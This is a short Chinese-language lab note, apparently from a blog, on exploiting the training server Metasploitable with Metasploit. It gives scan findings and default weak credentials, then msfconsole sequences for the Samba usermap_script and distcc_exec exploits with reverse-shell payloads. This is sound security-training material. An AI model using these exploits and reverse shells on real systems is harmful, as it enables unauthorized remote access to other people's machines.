您好,登錄后才能下訂單哦!
漏洞測試確實是可以的 當時把文章copy下來進行再進行測試。但是沒有copy到圖片,實驗是成功了,但是沒有那么直觀。
使用metasploit
對metasploitable 靶服務器進行***
metasploitable 是ubuntu8.0的版本
neuss掃描到漏洞
139端口可以獲取該系統主機名為“METASPLOITABLE”,注釋“metasploitable server (Samba 3.0.20-Debian)”;
系統存在弱口令,用戶user、msfadmin密碼與用戶名一樣,使用net use命令能夠建立連接查看共享資源。ftp開放版本信息 ProFTPD 1.3.1 Server (Debian),user這個用戶在ftp中也可以使用;
telnet服務開放,可確定該系統為Ubuntu 8.04,用戶user、msfadmin可以登錄,并獲得相應權限。如果不存在弱口令,通過截獲該telnet數據也能獲取用戶口令
一個distcc漏洞
一個samba 共享服務漏洞
msf對靶服務器的工具
smb-samba 共享服務
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost (ip address)
set lhost (ip address)
exploit
use exploit/unix/misc/distcc_exec
set payload cmd/unix/reverse_perl
set rhost (ip address)
set lhost (ip address)
exploit
distcc 成功 但是沒有root的權限
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。